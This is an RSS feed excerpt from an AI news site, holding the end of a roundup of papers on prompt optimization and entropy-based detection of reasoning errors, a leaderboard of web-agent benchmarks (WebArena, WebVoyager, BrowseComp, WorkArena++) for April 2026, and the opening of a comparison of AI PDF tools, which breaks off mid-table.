<p>If neither condition holds, optimization is unlikely to beat zero-shot. The diagnostic costs less than a single failed optimization run.</p>
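<p>The first check is, in effect, a two-factor ANOVA on a small held-out grid: vary each agent's prompt independently and test whether the interaction term explains any variance. The sketch below is a generic version of that test with statsmodels; the agent names, factor levels, and synthetic scores are assumptions, not the paper's tooling.</p>
<pre tabindex="0"><code>import numpy as np
import pandas as pd
from statsmodels.formula.api import ols
from statsmodels.stats.anova import anova_lm

rng = np.random.default_rng(0)
df = pd.DataFrame({
    "planner_prompt": ["A", "A", "B", "B"] * 6,            # prompt variant for agent 1
    "solver_prompt":  ["X", "Y", "X", "Y"] * 6,            # prompt variant for agent 2
    "score":          rng.normal(0.6, 0.1, size=24),       # stand-in for measured task scores
})

model = ols("score ~ C(planner_prompt) * C(solver_prompt)", data=df).fit()
table = anova_lm(model, typ=2)

# If the interaction row isn't significant, joint prompt optimization has little coupling to exploit.
print(table.loc["C(planner_prompt):C(solver_prompt)", ["F", "PR(&gt;F)"]])
</code></pre>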
<p>For anyone building compound AI systems, this finding is directly actionable. The <a href="/guides/prompt-engineering-basics/">prompt engineering basics</a> assumptions worth questioning aren't about which optimizer to use - they're about whether optimization is the right move at all for a given task.</p>
<hr>
<h2 id="guard-finding-where-reasoning-actually-breaks">GUARD: Finding Where Reasoning Actually Breaks</h2>
<p><strong>Authors:</strong> Wei Zhu, Jian Zhang, Lixing Yu, Kun Yue, Zhiwen Tang | arXiv:2604.14528 | Accepted at ACL 2026</p>
<p>Extended reasoning chains in LLMs - the kind generated by <a href="/guides/what-are-ai-reasoning-models/">AI reasoning models</a> - are assumed to reduce errors by allowing more computation. When a model fails, the implicit assumption is that errors accumulate gradually, or surface late in the chain as complexity compounds. Neither assumption is quite right.</p>
<p>Zhu et al. studied the distribution of reasoning errors across long inference chains and found something more tractable: &quot;errors are not uniformly distributed but often originate from a small number of early transition points.&quot; After one of these critical junctures, the reasoning stays internally consistent - it's just consistent with a wrong premise.</p>
<h3 id="the-entropy-signal">The Entropy Signal</h3>
<p>These failure points correlate with localized increases in token-level entropy. The model hesitates, in a measurable sense, and the direction it picks at that moment determines whether the rest of the chain succeeds or fails. Importantly, alternative paths from the same intermediate state can still yield correct answers - the fork hasn't committed the model to failure yet.</p>
<p>The GUARD framework uses these entropy signals to identify critical transitions at inference time and proactively redirect the reasoning toward alternative paths. Testing across multiple benchmarks confirmed that targeting these specific junctures improves reliability more efficiently than increasing total compute.</p>
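<p>The detection half of that idea is straightforward to reproduce if you can read the model's per-step logits: compute the entropy of the next-token distribution at each step and flag outlier spikes. The snippet below is a minimal illustration of that signal, not the GUARD implementation, and the z-score threshold is an arbitrary choice.</p>
<pre tabindex="0"><code>import torch
import torch.nn.functional as F

def token_entropy(logits: torch.Tensor) -&gt; torch.Tensor:
    # logits: (seq_len, vocab_size) next-token logits along the reasoning chain
    log_p = F.log_softmax(logits, dim=-1)
    return -(log_p.exp() * log_p).sum(dim=-1)        # entropy per generation step, in nats

def candidate_transition_points(logits: torch.Tensor, z: float = 2.0) -&gt; torch.Tensor:
    h = token_entropy(logits)
    spikes = h &gt; h.mean() + z * h.std()              # steps where the model measurably hesitates
    return spikes.nonzero(as_tuple=True)[0]          # indices worth branching or re-sampling from
</code></pre>
<p>GUARD's contribution is what happens at those indices - redirecting the chain onto an alternative path - rather than the detection itself.</p>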
<p><img src="/images/science/moe-routing-prompt-gambles-reasoning-breaks-reasoning.jpg" alt="Abstract AI visualization with branching pathways">
<em>Reasoning chains in LLMs don't fail gradually - errors originate at specific early transition points where token-level entropy spikes.</em>
<small>Source: unsplash.com</small></p>
<p>This connects to earlier work on <a href="/science/reasoning-traps-llm-chaos-steering-curves/">reasoning traps and LLM instability</a>, which documented failure modes without a clear intervention mechanism. GUARD provides one: a targeted inference-time redirect based on measurable uncertainty, not a blanket increase in sampling budget.</p>
<p>The practical implication is a shift in how to think about reasoning chain failures. The question isn't &quot;how long should the chain be&quot; - it's &quot;where does the chain first deviate and can we catch it.&quot;</p>
<hr>
<h2 id="the-common-thread">The Common Thread</h2>
<p>None of these papers argue for simplicity as an end in itself. What they share is a case for measurement before investment. MoE routing design is worth measuring before assuming it drives quality. Prompt optimization is worth pre-testing before running an expensive campaign. Reasoning chain failures are worth locating before adding compute.</p>
<p>The diagnostic tools in all three papers are cheap relative to the resources they save. That's a pattern worth following: before adding machinery, check whether the machinery does what you think it does.</p>
<hr>
<p><strong>Sources:</strong></p>
<ul>
<li><a href="https://arxiv.org/abs/2604.14419">Equifinality in Mixture of Experts - arXiv:2604.14419</a></li>
<li><a href="https://arxiv.org/abs/2604.14585">Prompt Optimization Is a Coin Flip - arXiv:2604.14585</a></li>
<li><a href="https://arxiv.org/abs/2604.14528">Dissecting Failure Dynamics in LLM Reasoning (GUARD) - arXiv:2604.14528</a></li>
</ul>
]]></content:encoded><dc:creator>Elena Marchetti</dc:creator><category>Science</category><media:content url="https://awesomeagents.ai/images/science/moe-routing-prompt-gambles-reasoning-breaks_hu_e8b16e7846e8f3d.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/science/moe-routing-prompt-gambles-reasoning-breaks_hu_e8b16e7846e8f3d.jpg" width="1200" height="675"/></item><item><title>Web Agent Benchmarks Leaderboard: Apr 2026</title><link>https://awesomeagents.ai/leaderboards/web-agent-benchmarks-leaderboard/</link><pubDate>Fri, 17 Apr 2026 20:13:55 +0200</pubDate><guid>https://awesomeagents.ai/leaderboards/web-agent-benchmarks-leaderboard/</guid><description>&lt;p>Web agents are the part of the AI stack where the rubber actually meets the road. Not a chat window - a model that opens a browser, reads what's on the screen, clicks buttons, fills forms, and either completes the task or fails. The benchmarks that measure this are messy, fragmented, and far harder to game than static multiple-choice evals. That's exactly why they matter.&lt;/p></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>Web agents are the part of the AI stack where the rubber actually meets the road. Not a chat window - a model that opens a browser, reads what's on the screen, clicks buttons, fills forms, and either completes the task or fails. The benchmarks that measure this are messy, fragmented, and far harder to game than static multiple-choice evals. That's exactly why they matter.</p>
<p>This leaderboard covers the major browser-specific benchmarks as of April 2026. Each suite tests something slightly different: task complexity, website diversity, the role of vision vs. text, and tolerance for ambiguity. No single number tells the full story. Read the methodology sections before drawing conclusions.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li>On WebArena's multi-step task suite, Claude Mythos Preview leads tracked models at 68.7%; specialized agentic frameworks (OpAgent, DeepSeek v3.2 as an agent backbone) reach 71-74% with heavier scaffolding, including online RL pipelines</li>
<li>WebVoyager scores near 97-98% for the top commercial agents in 2026, making that benchmark effectively saturated - look to WebChoreArena and BrowseComp for meaningful signal</li>
<li>BrowseComp is the hardest browsing eval in wide use: Deep Research scored 51.5% at launch, and the current top score is 86.9% for Claude Mythos Preview on the llm-stats.com tracker</li>
<li>Best budget pick for web tasks: open-source Browser Use framework running on GPT-4o hit 89.1% on WebVoyager, outperforming OpenAI's own Operator product (87%)</li>
</ul>
</div>
<h2 id="why-web-agent-benchmarks-differ-from-general-llm-evals">Why Web Agent Benchmarks Differ from General LLM Evals</h2>
<p>General benchmarks like MMLU or GPQA test whether a model knows things. Web agent benchmarks test whether a model can <em>do</em> things - navigate a real or simulated browser, interpret dynamic page content, chain actions across multiple steps, and recover from errors without human help.</p>
<p><img src="/images/leaderboards/web-agent-benchmarks-leaderboard-desk.jpg" alt="A laptop and monitor workstation setup representing the web browsing environment AI agents must navigate">
<em>AI agents operate on real or simulated browser environments, making web agent benchmarks a distinct category from static knowledge tests.</em>
<small>Source: unsplash.com</small></p>
<p>This distinction matters for benchmark selection. A model that tops GPQA may be terrible at clicking through a checkout flow. The correlation between raw LLM capability and web agent performance exists but isn't tight - scaffolding, observation format, and action space all contribute as much as the underlying model.</p>
<p>For context on how web agents relate to full desktop automation, see the <a href="/leaderboards/computer-use-leaderboard/">Computer Use Leaderboard: Desktop AI Agent Rankings</a>.</p>
<hr>
<h2 id="benchmark-overview">Benchmark Overview</h2>
<h3 id="webarena">WebArena</h3>
<p>The oldest major web agent eval. 812 tasks (241 templates, ~3.3 variations each) across four domains: e-commerce, social forums, code repositories, and content management. Tasks are long-horizon - &quot;Find when your last order shipped and post an update to the forum thread&quot; - with programmatic grading, no LLM judge involved. Scores are pass/fail success rate across all 812 tasks.</p>
<p>A verified, Docker-hosted version (webarena-verified) became available in February 2026, improving reproducibility. The original leaderboard at <a href="https://webarena.dev/">webarena.dev</a> lists community submissions.</p>
<h3 id="visualwebarena">VisualWebArena</h3>
<p>910 tasks built specifically for multimodal agents, where understanding what's on screen visually (images, product photos, UI layouts) is required to complete the task. Released by the same CMU group behind WebArena. At original publication in early 2024, the best VLM agent scored 16.4% against 88.7% human performance. Most current published results still cite the original paper rather than a live leaderboard.</p>
<h3 id="webvoyager">WebVoyager</h3>
<p>643 tasks across 15 popular websites - Google, Amazon, GitHub, Reddit, Wikipedia among them. Uses a dual evaluation approach: human annotation plus automated GPT-4V judgment. Published in 2024 with an original GPT-4V agent scoring 59.1%. The <a href="https://leaderboard.steel.dev/">Steel.dev leaderboard</a> now tracks live agent submissions against this benchmark.</p>
<h3 id="mind2web--mind2web-2">Mind2Web / Mind2Web 2</h3>
<p>The original Mind2Web (NeurIPS 2023) introduced 2,000+ open-ended tasks across 137 websites in 31 domains. Mind2Web 2, published at NeurIPS 2025, raised the bar substantially: 130 long-horizon tasks requiring real-time browsing and cross-site information synthesis, constructed with over 1,000 hours of human annotation. It uses an Agent-as-a-Judge framework with tree-structured rubrics. The best current system is OpenAI Deep Research at 50-70% of human performance.</p>
<p>Online-Mind2Web, a 2025 evaluation of 300 live tasks, showed that most commercially available agents underperform the academic SeeAct baseline from early 2024. The exceptions: Claude Computer Use 3.7 and OpenAI Operator at roughly 61% success.</p>
<h3 id="browsecomp">BrowseComp</h3>
<p>Released by OpenAI in April 2025. 1,266 hard information-retrieval problems designed to be nearly unsolvable by keyword search alone - tasks require multi-hop reasoning across multiple retrieved pages. At launch, GPT-4o with browsing scored 1.9%, o1 scored 9.9%, and Deep Research hit 51.5%. The <a href="https://cdn.openai.com/pdf/5e10f4ab-d6f7-442e-9508-59515c65e35d/browsecomp.pdf">full paper is available as a PDF</a>. Updated leaderboard data tracked by llm-stats.com puts scores far higher for 2026 frontier models.</p>
<h3 id="workarena--workarena">WorkArena / WorkArena++</h3>
<p>ServiceNow's enterprise-focused benchmark. WorkArena covers 33 atomic tasks in a ServiceNow instance. WorkArena++ scales this to 682 multi-step compositional tasks requiring planning, retrieval, arithmetic reasoning, and memory across browser sessions. Human performance is 93.9% on WorkArena++. GPT-4o managed only 2.1%, and no model hits meaningful performance on the L3 (ticket-like, context-rich) task tier.</p>
<h3 id="webchorearena">WebChoreArena</h3>
<p>A 2025 extension of WebArena with 532 tasks focused on tedious, labor-intensive work: massive memory retrieval, calculation across pages, and long-term cross-page reasoning. Gemini 2.5 Pro scores 54.8% on WebArena but drops to 37.8% on WebChoreArena. GPT-4o manages only 2.6% on WebChoreArena versus Gemini 2.5 Pro's 37.8%, a far wider gap between the two models than the base benchmark exposes.</p>
<hr>
<h2 id="rankings">Rankings</h2>
<h3 id="webarena---tracked-model-scores-april-2026">WebArena - Tracked Model Scores (April 2026)</h3>
<p>Scores from <a href="https://benchlm.ai/benchmarks/webArena">benchlm.ai</a>, which tracks 15 models against the standard 812-task suite.</p>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>WebArena Score</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>Claude Mythos Preview</td>
          <td>Anthropic</td>
          <td>68.7%</td>
      </tr>
      <tr>
          <td>2</td>
          <td>GPT-5.4 Pro</td>
          <td>OpenAI</td>
          <td>65.8%</td>
      </tr>
      <tr>
          <td>3</td>
          <td>Claude Opus 4.6</td>
          <td>Anthropic</td>
          <td>64.5%</td>
      </tr>
      <tr>
          <td>4</td>
          <td>GPT-5.4</td>
          <td>OpenAI</td>
          <td>62.3%</td>
      </tr>
      <tr>
          <td>5</td>
          <td>Claude Sonnet 4.6</td>
          <td>Anthropic</td>
          <td>59.2%</td>
      </tr>
      <tr>
          <td>6</td>
          <td>Gemini 3.1 Pro</td>
          <td>Google</td>
          <td>58.4%</td>
      </tr>
      <tr>
          <td>7</td>
          <td>Qwen3.6 Plus</td>
          <td>Alibaba</td>
          <td>57.2%</td>
      </tr>
      <tr>
          <td>8</td>
          <td>Qwen3.5 397B</td>
          <td>Alibaba</td>
          <td>55.8%</td>
      </tr>
      <tr>
          <td>9</td>
          <td>Grok 4.1</td>
          <td>xAI</td>
          <td>53.7%</td>
      </tr>
      <tr>
          <td>10</td>
          <td>Gemini 3 Pro</td>
          <td>Google</td>
          <td>52.1%</td>
      </tr>
      <tr>
          <td>11</td>
          <td>Kimi K2.5</td>
          <td>Moonshot AI</td>
          <td>51.3%</td>
      </tr>
      <tr>
          <td>12</td>
          <td>GLM-5 Reasoning</td>
          <td>Z.AI</td>
          <td>49.8%</td>
      </tr>
      <tr>
          <td>13</td>
          <td>DeepSeek V3.2 Thinking</td>
          <td>DeepSeek</td>
          <td>48.6%</td>
      </tr>
      <tr>
          <td>14</td>
          <td>Llama 4 Behemoth</td>
          <td>Meta</td>
          <td>46.2%</td>
      </tr>
      <tr>
          <td>15</td>
          <td>o4-mini (high)</td>
          <td>OpenAI</td>
          <td>44.5%</td>
      </tr>
  </tbody>
</table>
<p>Note: Specialized agentic frameworks that wrap models can score higher. OpAgent (CodeFuse AI) reached 71.6% on WebArena using a Planner-Grounder-Reflector-Summarizer multi-agent pipeline with online reinforcement learning, holding the #1 leaderboard position in January 2026. DeepSeek v3.2 as an agent backbone (not raw model) hit 74.3% in the Steel.dev results index, which tracks end-to-end agent systems rather than raw model calls.</p>
<h3 id="webvoyager---top-agent-systems-april-2026">WebVoyager - Top Agent Systems (April 2026)</h3>
<p>From the <a href="https://leaderboard.steel.dev/">Steel.dev Browser Agent Leaderboard</a>, tracking end-to-end agent submissions.</p>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Agent</th>
          <th>Organization</th>
          <th>WebVoyager Score</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>Alumnium</td>
          <td>Alumnium</td>
          <td>98.5%</td>
      </tr>
      <tr>
          <td>2</td>
          <td>Surfer 2</td>
          <td>H Company</td>
          <td>97.1%</td>
      </tr>
      <tr>
          <td>3</td>
          <td>Magnitude</td>
          <td>Magnitude</td>
          <td>93.9%</td>
      </tr>
      <tr>
          <td>4</td>
          <td>AIME Browser-Use</td>
          <td>Aime</td>
          <td>92.3%</td>
      </tr>
      <tr>
          <td>5</td>
          <td>Surfer-H + Holo1</td>
          <td>H Company</td>
          <td>92.2%</td>
      </tr>
      <tr>
          <td>6</td>
          <td>Browserable</td>
          <td>Browserable</td>
          <td>90.4%</td>
      </tr>
      <tr>
          <td>7</td>
          <td>Browser Use</td>
          <td>Browser Use</td>
          <td>89.1%</td>
      </tr>
      <tr>
          <td>8</td>
          <td>Operator</td>
          <td>OpenAI</td>
          <td>87.0%</td>
      </tr>
      <tr>
          <td>9</td>
          <td>Skyvern 2.0</td>
          <td>Skyvern</td>
          <td>85.9%</td>
      </tr>
      <tr>
          <td>10</td>
          <td>Project Mariner</td>
          <td>Google</td>
          <td>83.5%</td>
      </tr>
      <tr>
          <td>-</td>
          <td>WebVoyager (original)</td>
          <td>Academic</td>
          <td>59.1%</td>
      </tr>
  </tbody>
</table>
<p>WebVoyager scores are approaching saturation. Scores above 90% are common enough that the benchmark no longer differentiates the top tier well.</p>
<h3 id="browsecomp---model-scores-april-2026">BrowseComp - Model Scores (April 2026)</h3>
<p>From the llm-stats.com tracker, which covers 40 models. BrowseComp scores are reported as fractions (0.0-1.0).</p>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>BrowseComp Score</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>Claude Mythos Preview</td>
          <td>Anthropic</td>
          <td>0.869</td>
      </tr>
      <tr>
          <td>2</td>
          <td>Gemini 3.1 Pro</td>
          <td>Google</td>
          <td>0.859</td>
      </tr>
      <tr>
          <td>3</td>
          <td>Claude Opus 4.6</td>
          <td>Anthropic</td>
          <td>0.840</td>
      </tr>
      <tr>
          <td>4</td>
          <td>GPT-5.4</td>
          <td>OpenAI</td>
          <td>0.827</td>
      </tr>
      <tr>
          <td>5</td>
          <td>GLM-5.1</td>
          <td>Zhipu AI</td>
          <td>0.793</td>
      </tr>
      <tr>
          <td>6</td>
          <td>GPT-5.2 Pro</td>
          <td>OpenAI</td>
          <td>0.779</td>
      </tr>
      <tr>
          <td>7</td>
          <td>Seed 2.0 Pro</td>
          <td>ByteDance</td>
          <td>0.773</td>
      </tr>
      <tr>
          <td>8</td>
          <td>MiniMax M2.5</td>
          <td>MiniMax</td>
          <td>0.763</td>
      </tr>
      <tr>
          <td>9</td>
          <td>GLM-5</td>
          <td>Zhipu AI</td>
          <td>0.759</td>
      </tr>
      <tr>
          <td>10</td>
          <td>Kimi K2.5</td>
          <td>Moonshot AI</td>
          <td>0.749</td>
      </tr>
      <tr>
          <td>11</td>
          <td>Claude Sonnet 4.6</td>
          <td>Anthropic</td>
          <td>0.747</td>
      </tr>
      <tr>
          <td>12</td>
          <td>Qwen3.5-397B</td>
          <td>Alibaba</td>
          <td>0.690</td>
      </tr>
      <tr>
          <td>-</td>
          <td>Deep Research (launch)</td>
          <td>OpenAI</td>
          <td>0.515</td>
      </tr>
      <tr>
          <td>-</td>
          <td>o3</td>
          <td>OpenAI</td>
          <td>0.497</td>
      </tr>
      <tr>
          <td>-</td>
          <td>GPT-4o with browsing</td>
          <td>OpenAI</td>
          <td>0.019</td>
      </tr>
  </tbody>
</table>
<p>The jump from 0.515 (Deep Research at launch) to 0.869 in under a year is steep. BrowseComp remains the hardest widely-used browsing eval and hasn't saturated yet.</p>
<p><img src="/images/leaderboards/web-agent-benchmarks-leaderboard-dashboard.jpg" alt="A web performance analytics dashboard showing real-time data - similar to what web agents must interpret and reason about during task completion">
<em>Web agents must interpret and act on complex data-rich interfaces like dashboards. Benchmarks like WorkArena++ specifically test this kind of enterprise SaaS interaction.</em>
<small>Source: unsplash.com</small></p>
<hr>
<h2 id="key-takeaways">Key Takeaways</h2>
<h3 id="anthropic-and-openai-trade-leads-depending-on-the-benchmark">Anthropic and OpenAI Trade Leads Depending on the Benchmark</h3>
<p>Anthropic's models dominate WebArena and BrowseComp. On WebVoyager, specialist agent frameworks lead outright, with OpenAI's Operator the strongest product from a major lab. Google's Gemini 3.1 Pro ranks second on BrowseComp at 0.859 and shows competitive WebArena numbers. The gap between providers has closed significantly since late 2024.</p>
<h3 id="agentic-frameworks-beat-raw-model-calls-by-a-wide-margin">Agentic Frameworks Beat Raw Model Calls by a Wide Margin</h3>
<p>The 74.3% DeepSeek v3.2 agent score on WebArena versus the same model's 48.6% raw-model score shows what a well-designed scaffolding layer contributes. OpAgent's online RL pipeline - where the agent learns from task failures on the fly - represents the current state of the art for WebArena. Raw model API calls are not the right comparison point for production web agent deployments.</p>
<h3 id="webvoyager-has-saturated">WebVoyager Has Saturated</h3>
<p>Near-perfect WebVoyager scores no longer distinguish good systems from excellent ones. Scores in the 90-98% range are clustered, and the benchmark uses GPT-4V as a judge - which may not reliably distinguish between a 92% and a 97% agent. Researchers and practitioners should weight WebChoreArena (the harder variant) and BrowseComp more heavily.</p>
<h3 id="enterprise-web-tasks-remain-very-hard">Enterprise Web Tasks Remain Very Hard</h3>
<p>WorkArena++ at 2.1% for GPT-4o makes the frontier model gap with humans (93.9%) vivid. The benchmark's L3 tasks - which mirror real ServiceNow workflows with complex context requirements - have effectively zero LLM success now. Any vendor claiming &quot;autonomous enterprise agent&quot; capabilities should be pressed on WorkArena++ L3 numbers.</p>
<h3 id="open-source-agents-are-competitive">Open-Source Agents Are Competitive</h3>
<p>Browser Use (open-source) beat OpenAI's commercial Operator on WebVoyager, 89.1% vs 87%. The performance gap between open and closed systems that defined 2024 has mostly closed at the framework level. The underlying models still favor closed-source providers, but the agent scaffolding is no longer a meaningful differentiator.</p>
<hr>
<h2 id="practical-guidance">Practical Guidance</h2>
<h3 id="for-general-web-task-automation">For general web task automation</h3>
<p>If you're building browser agents on top of frontier model APIs, Claude Opus 4.6 or GPT-5.4 as the backbone gives you the strongest raw capability. Pair either with the Browser Use open-source framework (see our <a href="/tools/best-ai-browser-automation-tools-2026/">Best AI Browser Automation Tools</a> roundup) rather than building scaffolding from scratch. The open-source frameworks now match or exceed proprietary agent products on standard benchmarks.</p>
<h3 id="for-research-on-web-agents">For research on web agents</h3>
<p>BrowseComp and WebChoreArena are the benchmarks worth tracking in 2026. WebVoyager provides a useful regression check but shouldn't be the primary eval. For enterprise-specific scenarios, WorkArena++ L2 is realistic; L3 results tell you how far you still have to go. Mind2Web 2 is the right choice for agentic search and long-horizon information tasks.</p>
<h3 id="for-commercial-web-agent-products">For commercial web agent products</h3>
<p>If you're evaluating products like OpenAI Operator, Google Project Mariner, or Skyvern, ask for BrowseComp scores rather than WebVoyager scores. BrowseComp's hard information-retrieval problems separate agents that actually reason from agents that pattern-match. Our <a href="/tools/best-ai-browser-agents-2026/">Best AI Browser Agents</a> guide covers the commercial product landscape.</p>
<h3 id="for-open-source-work">For open-source work</h3>
<p>The Browser Use framework running on GPT-4o is the strongest open-source baseline. MolMo-Web (AI2) is a <a href="/news/molmoweb-ai2-open-source-web-agent/">notable recent open-source web agent</a> worth watching if you need a permissively licensed option. The BrowserGym ecosystem from ServiceNow provides a unified test harness across WebArena, WorkArena, VisualWebArena, and others - useful if you want reproducible comparisons across benchmarks.</p>
<hr>
<h2 id="faq">FAQ</h2>
<h3 id="which-web-agent-benchmark-should-i-use-for-evaluating-my-system">Which web agent benchmark should I use for evaluating my system?</h3>
<p>Use BrowseComp for hard information-retrieval tasks, WebChoreArena for tedious multi-step tasks, and WorkArena++ for enterprise SaaS workflows. WebVoyager is near-saturated for top systems; use it as a baseline check only.</p>
<h3 id="whats-the-difference-between-webarena-and-webvoyager">What's the difference between WebArena and WebVoyager?</h3>
<p>WebArena uses four simulated websites with programmatic grading and 812 multi-step tasks. WebVoyager uses 15 live real-world websites with 643 tasks and GPT-4V automated judging. WebArena is more reproducible; WebVoyager tests live-web generalization.</p>
<h3 id="can-open-source-agents-match-commercial-products-on-web-tasks">Can open-source agents match commercial products on web tasks?</h3>
<p>Yes, at the framework level. Browser Use (open-source) scored 89.1% on WebVoyager vs 87% for OpenAI Operator. The underlying model still matters, but the scaffolding gap has closed significantly.</p>
<h3 id="how-do-workarena-scores-compare-to-real-enterprise-automation">How do WorkArena++ scores compare to real enterprise automation?</h3>
<p>WorkArena++ L3 tasks have near-zero LLM success rates vs 93.9% for humans. No current LLM-based agent should be trusted for unsupervised enterprise workflow automation without significant human oversight.</p>
<h3 id="how-often-do-these-rankings-change">How often do these rankings change?</h3>
<p>WebVoyager and BrowseComp update frequently as new agent submissions arrive. WebArena updates more slowly. WorkArena++ results have been stable since mid-2025. Check Steel.dev and benchlm.ai for current snapshots.</p>
<hr>
<p><strong>Sources:</strong></p>
<ul>
<li><a href="https://webarena.dev/">WebArena: A Realistic Web Environment for Building Autonomous Agents</a></li>
<li><a href="https://github.com/web-arena-x/webarena">WebArena GitHub Repository</a></li>
<li><a href="https://github.com/web-arena-x/visualwebarena">VisualWebArena GitHub Repository</a></li>
<li><a href="https://arxiv.org/abs/2401.13919">WebVoyager: Building an End-to-End Web Agent with Large Multimodal Models</a></li>
<li><a href="https://github.com/MinorJerry/WebVoyager">WebVoyager GitHub Repository</a></li>
<li><a href="https://osu-nlp-group.github.io/Mind2Web-2/">Mind2Web 2 Benchmark Page</a></li>
<li><a href="https://cdn.openai.com/pdf/5e10f4ab-d6f7-442e-9508-59515c65e35d/browsecomp.pdf">BrowseComp Technical Paper (PDF)</a></li>
<li><a href="https://servicenow.github.io/WorkArena/">WorkArena: How Capable Are Web Agents at Solving Common Knowledge Work Tasks?</a></li>
<li><a href="https://github.com/ServiceNow/WorkArena">WorkArena GitHub Repository</a></li>
<li><a href="https://arxiv.org/abs/2403.07718">WorkArena++ NeurIPS 2024 Paper</a></li>
<li><a href="https://webchorearena.github.io/">WebChoreArena Project Page</a></li>
<li><a href="https://arxiv.org/abs/2407.15711">AssistantBench: Can Web Agents Solve Realistic and Time-Consuming Tasks?</a></li>
<li><a href="https://browser-use.com/posts/sota-technical-report">Browser Use State-of-the-Art Technical Report</a></li>
<li><a href="https://leaderboard.steel.dev/">Steel.dev AI Browser Agent Leaderboard</a></li>
<li><a href="https://github.com/codefuse-ai/OpAgent">OpAgent: Operator Agent for Web Navigation</a></li>
<li><a href="https://benchlm.ai/benchmarks/webArena">BenchLM.ai WebArena Leaderboard</a></li>
</ul>
]]></content:encoded><dc:creator>James Kowalski</dc:creator><category>Leaderboards</category><media:content url="https://awesomeagents.ai/images/leaderboards/web-agent-benchmarks-leaderboard_hu_6b9065d7101686e6.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/leaderboards/web-agent-benchmarks-leaderboard_hu_6b9065d7101686e6.jpg" width="1200" height="675"/></item><item><title>Best AI PDF Tools 2026: Consumer Chat vs Dev APIs</title><link>https://awesomeagents.ai/tools/best-ai-pdf-tools-2026/</link><pubDate>Fri, 17 Apr 2026 20:11:49 +0200</pubDate><guid>https://awesomeagents.ai/tools/best-ai-pdf-tools-2026/</guid><description>&lt;p>There are two very different problems in the AI PDF space, and vendors tend to blur them together. One is the consumer use case: upload a contract, textbook, or research paper and ask questions about it. The other is production document extraction: pull structured tables, form fields, and equations from millions of pages to feed downstream systems. The tools that solve one of these well often fail at the other. This guide separates the two categories and ranks each on data that you can verify.&lt;/p></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>There are two very different problems in the AI PDF space, and vendors tend to blur them together. One is the consumer use case: upload a contract, textbook, or research paper and ask questions about it. The other is production document extraction: pull structured tables, form fields, and equations from millions of pages to feed downstream systems. The tools that solve one of these well often fail at the other. This guide separates the two categories and ranks each on data that you can verify.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li>Best consumer PDF chat overall: <strong>ChatDOC</strong> - accurate citations, GPT-4o access, 200-page free tier</li>
<li>Best developer extraction API: <strong>Mistral OCR</strong> - 96.1% table accuracy, $1 per 1,000 pages with batch pricing</li>
<li>For zero-cost self-hosting: <strong>Docling</strong> (IBM open-source) and <strong>Marker</strong> are both strong, with Docling scoring 0.882 on OmniDocBench text fidelity vs Marker's 0.861</li>
<li>Azure and AWS are reliable for forms at scale but cost 6-40x more than Mistral OCR per page</li>
<li>LlamaParse is the default for RAG pipelines already using LlamaIndex, but gets expensive fast on complex layouts</li>
</ul>
</div>
<h2 id="what-this-guide-covers">What This Guide Covers</h2>
<p>The consumer/SaaS tools reviewed here - ChatPDF, Adobe Acrobat AI Assistant, HumataAI, AskYourPDF, ChatDOC, PDF.ai, LightPDF AI, and Smallpdf AI - are aimed at professionals, students, and researchers who need to interact with documents through a chat interface.</p>
<p>The developer/API tools - Mistral OCR, LlamaParse, Reducto, Unstructured.io, Azure AI Document Intelligence, AWS Textract, Google Document AI, Marker, and Docling - are aimed at engineering teams building pipelines. They're evaluated differently: output format fidelity, table/equation accuracy, throughput, and cost per page matter more than chat quality.</p>
<p>If you're building a RAG pipeline and want to understand how these extraction tools fit into a retrieval architecture, see the <a href="/tools/best-ai-rag-tools-2026/">best AI RAG tools guide</a>. If structured data extraction from spreadsheets is your goal, the <a href="/tools/best-ai-data-analysis-tools-2026/">best AI data analysis tools guide</a> covers that separately.</p>
<hr>
<h2 id="consumer-pdf-chat-tools">Consumer PDF Chat Tools</h2>
<h3 id="comparison-table">Comparison Table</h3>
<table>
  <thead>
      <tr>
          <th>Tool</th>
          <th>Free Tier</th>
          <th>Paid Plan</th>
          <th>Context / Page Limit</th>
          <th>Highlights</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>ChatDOC</td>
          <td>5 uploads/day, 300 questions</td>
          <td>$8.99/month</td>
          <td>200 pages/file (free)</td>
          <td>GPT-4o, citation tracing, OCR</td>
      </tr>
      <tr>
          <td>ChatPDF</td>
          <td>2 PDFs/day</td>
          <td>Plus (unlimited)</td>
          <td>120 pages/file (free)</td>
          <td>GPT-4o/4o-mini routing, no login needed</td>
      </tr>
      <tr>
          <td>HumataAI</td>
          <td>10 answers/month, 60 pages</td>
          <td>$9.99/month (Expert)</td>
          <td>500 pages (Expert)</td>
          <td>Best for academic docs</td>
      </tr>
      <tr>
          <td>AskYourPDF</td>
          <td>50 questions/day</td>
          <td>$11.99/month</td>
          <td>2,500 pages (paid)</td>
          <td>Plugin ecosystem, 50 docs/day paid</td>
      </tr>
      <tr>
          <td>Adobe Acrobat AI</td>
          <td>No free AI tier</td>
          <td>$4.99/month add-on</td>
          <td>Up to 10 files, 600 pages each</td>
          <td>Native PDF editing + AI chat</td>
      </tr>
      <tr>
          <td>LightPDF AI</td>
          <td>8 questions/day</td>
          <td>$19.99/month</td>
          <td>100 MB file limit</td>
          <td>25+ PDF tools bundled</td>
      </tr>
      <tr>
          <td>PDF.ai</td>
          <td>Limited daily use</td>
          <td>$15/month</td>
          <td>Unlimited docs (Pro)</td>
          <td>Clean UI, unlimited chat</td>
      </tr>
      <tr>
          <td>Smallpdf AI</td>
          <td>Unlimited basic Q&amp;A</td>
          <td>$12/month (Pro)</td>
          <td>No registration needed</td>
          <td>Fast summaries, EU-hosted</td>
      </tr>
  </tbody>
